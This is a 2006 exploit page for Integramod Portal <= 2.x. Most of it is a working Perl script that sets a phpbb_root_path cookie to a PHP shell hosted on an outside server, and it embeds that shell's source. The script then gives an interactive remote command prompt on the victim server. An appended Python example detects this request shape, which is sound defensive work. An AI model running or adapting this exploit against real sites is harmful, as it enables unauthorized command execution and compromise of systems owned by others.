Integramod Portal <= 2.x (functions_portal.php) Remote Include Exploit
Source: http://www.nukedx.com Author: nukedx Published: 2006-08-24

#!/usr/bin/perl
# Method found and exploit scripted by nukedx
# Contacts> ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: nukedx@nukedx.com
# Original advisory can be found at: http://www.nukedx.com/?viewdoc=47
#
# Integramod Portal <= 2.x Remote Command Execution Exploit
#
# This exploit comes with its own php shell setting. If you wanna change it your file must contain this data >
#
# <?php
# echo "_START_\n";
# ini_set("max_execution_time",0);
# error_reporting(0);
# passthru($_REQUEST[command]);
# echo "\n_END_";
# ?>
#
# Copyright 2006 (C) nukedx
#
# Greetz to: WW,xT,php from my team NWPX , str0ke , cha0s , Preddy , Yns , |SaMaN|, Caesar , Ogre and all of my friends
use IO::Socket;

# Default configuration
$shell = "http://hometown.aol.com/yarivgiladi/sh.php";

# Checking user settings
if(@ARGV != 2) { usage(); }
else { exploit(); }

sub header()
{
    print "\n- NukedX Security Advisory Nr.2006-43\r\n";
    print "- Integramod Portal<= 2.x Remote Command Execution Exploit\r\n";
}

sub usage()
{
    header();
    print "- Usage: $0 <host> <path>\r\n";
    print "- <host> -> Victim's host ex: www.victim.com\r\n";
    print "- <path> -> Path to Integramod ex: /integra/ or just /\r\n";
    exit();
}

sub exploit() {
    # User variables
    $host = $ARGV[0];
    $host =~ s/(http:\/\/)//eg;
    $target = $ARGV[1]."includes/functions_portal.php";
    $good = 0;
    $c2s = "command=whoami";
    $c2slen = length($c2s);
    print "Trying to connect: $host\r\n";
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "Connection failed...\r\n";
    print "Connected to victim: $host\r\n";
    print $sock "POST $target HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Accept: */*\n";
    print $sock "Referer: $host\r\n";
    print $sock "Accept-Language: tr\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
    print $sock "Accept-Encoding: gzip, deflate\r\n";
    print $sock "User-Agent: NukeZilla\r\n";
    print $sock "Cookie: phpbb_root_path=".$shell."?\r\n";
    print $sock "Content-length: $c2slen\r\n";
    print $sock "Connection: Keep-Alive\r\n";
    print $sock "Cache-Control: no-cache\r\n\r\n";
    print $sock $c2s;
    print $sock "\r\n\r\n";
    while($result = <$sock>)
    {
        if($result =~ /^_END_/)
        {
            $good=0;
            close($sock);
        }
        if($good==1)
        {
            if (!$whoami) {
                $whoami = trim($result);
                print "Logged as $whoami\r\nType exit for exit dont press ctrl+c\r\n";
            }
        }
        if ($good==0)
        {
            if ($result =~ /Warning: include_once/) { print "Sorry victim is not vulnerable...\r\nClosing exploit...\r\n";sleep(3);exit(); }
        }
        if($result =~ /^_START_/)
        {
            $good=1;
        }
    }
    while()
    {
        print "[".$whoami."@".$host." /]\$ ";
        while(<STDIN>)
        {
            $cmds=$_;
            chomp($cmds);
            last;
        }
        if ($cmds =~ /^exit/) { print "Closing exploit...\r\n";sleep(3);exit(); }
        else { sendcmd(); }
    }
}

sub sendcmd () {
    $c2s = "command=".$cmds;
    $c2slen = length($c2s);
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "Connection lost...\r\n";
    print $sock "POST $target HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Accept: */*\n";
    print $sock "Referer: $host\r\n";
    print $sock "Accept-Language: tr\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
    print $sock "Accept-Encoding: gzip, deflate\r\n";
    print $sock "User-Agent: NukeZilla\r\n";
    print $sock "Cookie: phpbb_root_path=".$shell."?\r\n";
    print $sock "Content-length: $c2slen\r\n";
    print $sock "Connection: Keep-Alive\r\n";
    print $sock "Cache-Control: no-cache\r\n\r\n";
    print $sock $c2s;
    print $sock "\r\n\r\n";
    while($result = <$sock>)
    {
        if($result =~ /^_END_/)
        {
            $good=0;
            close($sock);
        }
        if($good==1)
        {
            print $result;
        }
        if ($good==0)
        {
            if ($result =~ /Warning: include_once/) { print "Sorry victim is not vulnerable or patched!...\r\nClosing exploit...\r\n";sleep(3);exit(); }
        }
        if($result =~ /^_START_/)
        {
            $good=1;
        }
    }
}

sub trim($)
{
    my $string = shift;
    $string =~ s/^\s+//;
    $string =~ s/\s+$//;
    return $string;
}
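
Added example (not part of nukedx's script or the original page): a request-side detection check for the request shape the script above sends, namely a phpbb_root_path cookie carrying a URL plus a direct request to includes/functions_portal.php. The sample requests, hosts, finding names and the list of schemes are assumptions of this example.

```python
import re
from urllib.parse import unquote

COOKIE_NAME = "phpbb_root_path"                  # cookie set by the script above
TARGET_SUFFIX = "includes/functions_portal.php"  # file the script requests
# Assumption: a value starting with one of these schemes is never legitimate here.
REMOTE_SCHEME = re.compile(r"^\s*(https?|ftps?|php|data|expect)\s*:", re.I)

def parse_request(raw):
    """Return (path, headers); accepts the mixed LF / CRLF endings the script sends."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = re.split(r"\r?\n", head)
    path = (lines[0].split(" ") + [""])[1]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return path, headers

def cookie_value(headers, name):
    """Return the URL-decoded value of one cookie, or None if it is absent."""
    for part in headers.get("cookie", "").split(";"):
        key, sep, value = part.strip().partition("=")
        if sep and key.strip() == name:
            return unquote(value)
    return None

def classify(raw):
    """Return the findings for one raw request; an empty list means clean."""
    path, headers = parse_request(raw)
    findings = []
    value = cookie_value(headers, COOKIE_NAME)
    if value is not None:
        findings.append("cookie-sets-phpbb_root_path")
        if REMOTE_SCHEME.match(value):
            findings.append("remote-include-url")
    if unquote(path).split("?", 1)[0].lower().endswith(TARGET_SUFFIX):
        findings.append("direct-request-to-functions_portal")
    return findings

# Constructed sample requests (not captured traffic); hosts are placeholders.
SAMPLE_EXPLOIT = ("POST /integra/includes/functions_portal.php HTTP/1.1\n"
                  "Host: forum.example\n"
                  "Cookie: phpbb_root_path=http://files.example/sh.php?\r\n\r\n")
SAMPLE_ENCODED = ("GET /integra/index.php HTTP/1.1\r\nHost: forum.example\r\n"
                  "Cookie: sid=abc; phpbb_root_path=ftp%3A%2F%2Ffiles.example%2Fx%3F\r\n\r\n")
SAMPLE_CLEAN = ("GET /integra/index.php HTTP/1.1\r\nHost: forum.example\r\n"
                "Cookie: phpbb2mysql_sid=0123abcd\r\n\r\n")
```

The Apache common and combined access-log formats do not record the Cookie header, so this check needs requests reconstructed from a proxy, WAF or packet capture, or a log format extended to include cookies.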
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved